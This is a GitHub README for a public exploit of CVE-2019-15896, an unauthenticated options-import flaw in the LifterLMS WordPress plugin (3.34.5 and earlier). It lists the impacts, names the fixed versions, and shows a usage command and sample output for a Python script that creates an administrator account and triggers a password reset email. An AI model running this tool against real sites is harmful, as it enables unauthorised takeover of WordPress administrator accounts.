https://github.com/randomrobbiebf/cve-2019-15896

LifterLMS <= 3.34.5 - Unauthenticated Options Import

# CVE-2019-15896
LifterLMS <= 3.34.5 - Unauthenticated Options Import

# Description

Unauthenticated options import, which could lead to:

- Website Redirection

- Administrator Account Creation

- Content Injection

- Stored XSS

The issues have been reported as fixed in 3.35.0. However, v3.35.1 added further input sanitisation and filtering.

How to use
---

```
$ python3 CVE-2019-15896.py --url http://wordpress.lan --username radmin --email [email protected]
LifterLMS <= 3.34.5 - Unauthenticated Options Import
Exploit By Ramdom Robbie
Once ran check your email for the forgotten password link.
Password reset email sent to [email protected]
```

Info
---

```
Requires access to login.php and a working email address, and the site needs to be able to send emails.
```